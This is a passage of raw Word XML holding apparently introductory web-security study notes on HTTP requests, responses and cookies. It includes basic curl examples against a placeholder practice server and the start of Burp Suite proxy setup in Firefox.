    <w:p w14:paraId="73B9BAA8" w14:textId="453111E1" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Request Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687B238" w14:textId="65312419" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>POST – content sent to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942C74C" w14:textId="0391D615" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET – typically ignored by server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE86EC" w14:textId="34458744" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful for forensics and analyzing packet captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62FB8A" w14:textId="27CD864E" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A637BA" w14:textId="02BC7914" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First line is status rather than a verb (like 404)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DB11C" w14:textId="54E8BFAA" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Response headers are important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DB6C0" w14:textId="4B587E2E" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Tell something about the server sending them or provide cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED85E7" w14:textId="1FFA281A" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also have body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE12F9B" w14:textId="69D3216D" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET – web content, JSON info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B63294" w14:textId="787C6E0D" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>POST – status messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896DD76" w14:textId="2D7FFBFF" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3330A" w14:textId="139A5ED0" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Specific to browsers, not shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24340172" w14:textId="5319ACE8" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session management, advertising</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B3206" w14:textId="010B9664" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically sent with every HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34952BB5" w14:textId="18E1A9D0" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Keep track of other stateless HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C5DF7" w14:textId="7A34E352" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Have several parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A01AD49" w14:textId="6D7319F7" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Name, value, expiry date, path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7FA5C" w14:textId="1338BFBA" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normally set by server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FEFD5" w14:textId="1D11C0CA" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server response headers (“Set-Cookie”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1DD328" w14:textId="4CA3376E" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Or by JS in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C925F56" w14:textId="3FBEDF0D" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187FD3D6" w14:textId="6E647C3B" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>View and modify with dev tools, storage, create cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFED21B" w14:textId="5D5B9F49" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274E8115" w14:textId="3270563C" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SessionStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AA90335" w14:textId="12FB5EEE" w:rsidR="00950669" w:rsidRPr="0084205E" w:rsidRDefault="00950669" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTML5 features not sent by HTTP by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50758309" w14:textId="15DC0992" w:rsidR="00877A38" w:rsidRPr="0084205E" w:rsidRDefault="00877A38" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To make GET when provided with IP and port #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F7213" w14:textId="3567D64B" w:rsidR="00877A38" w:rsidRPr="0084205E" w:rsidRDefault="00877A38" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/path/get</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B94D42F" w14:textId="72EAFE38" w:rsidR="00877A38" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>POST request – make POST request with body “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>flag_please</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27B0D7" w14:textId="299C356E" w:rsidR="00222154" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/path/post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -X POST -d “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>flag_please</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA82A4" w14:textId="72B77583" w:rsidR="00222154" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-d = HTTP POST data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03241157" w14:textId="06C3DC45" w:rsidR="00222154" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-X = request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E5EA2E" w14:textId="78D8AFFF" w:rsidR="00222154" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4B310" w14:textId="62B98D66" w:rsidR="00222154" w:rsidRPr="0084205E" w:rsidRDefault="00222154" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Curl -v </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00282718" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/&lt;path&gt;&lt;getcookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00282718" w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E5405" w14:textId="382E3B3C" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-v is important to list cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A344C3" w14:textId="270103E3" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SET cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F43F91C" w14:textId="7F862FEA" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Curl </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/path/sendcookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> --cookie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>flagpls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>flagpls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59E92D6D" w14:textId="7581B511" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>- - cookie argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C52C7" w14:textId="665AA027" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Named variable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>flagpls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DBEF24D" w14:textId="2910AD03" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4CC386" w14:textId="43332305" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00282718" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>BURPSUITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD35AD9" w14:textId="0BCBECC0" w:rsidR="00282718" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Setting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> certificate for Firefox to act as proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29462EEF" w14:textId="6AF23C04" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69F5443C" w14:textId="07B5D3C4" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create and add settings for Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589BE9F" w14:textId="27FA31FA" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445BFEDD" w14:textId="221C1BEB" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67BE45" w14:textId="1216594F" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00637DAF" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8080</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CB736DB" w14:textId="3C29CCF0" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Download CA cert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7DB7F" w14:textId="77C91FF9" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Settings in Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DC99A7" w14:textId="2B2CD10D" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>View certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CB1FE" w14:textId="1E69DF14" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
